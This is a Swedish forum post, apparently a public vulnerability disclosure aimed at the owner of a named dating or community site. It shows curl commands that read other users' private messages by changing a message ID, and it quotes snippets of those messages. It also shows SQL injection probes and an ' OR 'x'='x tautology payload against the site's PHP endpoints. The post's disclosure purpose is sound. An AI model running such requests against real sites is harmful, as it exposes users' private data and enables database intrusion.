Jag har suttit 10 minuter med din sida och redan hittat kritiska buggar.
Vem som helst kan läsa andras privata meddelande:
Kod:
$ curl -F "messageID=4566" http://w w w . 5 0 l a p p e n . s e/pages/messages/getMessageData.php
Nu på lördag!
Startar vi vår kampanj!
$ curl -F "messageID=4570" http://w w w . 5 0 l a p p e n . s e/pages/messages/getMessageData.php
Hej, det låter bra, men hur kan jag kontrollera att du lagt upp några länkar åt oss? Och att det är på bloggar som faktiskt har någon trafik?
Mvh
SQL injections finns lite överallt. T ex:
http://w w w . 5 0 l a p p e n . s e...ckUsername.php samt nästan alla php filer som anropas från AJAX, getMessageData.php bland annat.
Här ser man att du varken filtrerar dina queries eller använder prepared statements:
Kod:
$ curl -F "username='" http://w w w . 5 0 l a p p e n . s e/pages/register/checkUsername.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
$ curl -F "messageID='76" http://w w w . 5 0 l a p p e n . s e/pages/messages/getMessageData.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '76'' at line 1
Så länge det inte finns någon användare som heter "' OR 'x'='x" så borde detta returnera en 1:a, dock så får man tillbaka en 0:a för att den hittar alla användare:
Kod:
$ curl -F "username=' OR 'x'='x" http://w w w . 5 0 l a p p e n . s e/pages/register/checkUsername.php
0
Det hade gått att göra roligare saker med din databas, men det låter jag upp till dina utvecklare =)
Jag vill poängtera jag inte ändrat din databas, tagit hem någon information alls eller skadat sidan på något annat sätt. Mitt meddelande är menat som information till dig och upplysning till de som har ett konto på din sida.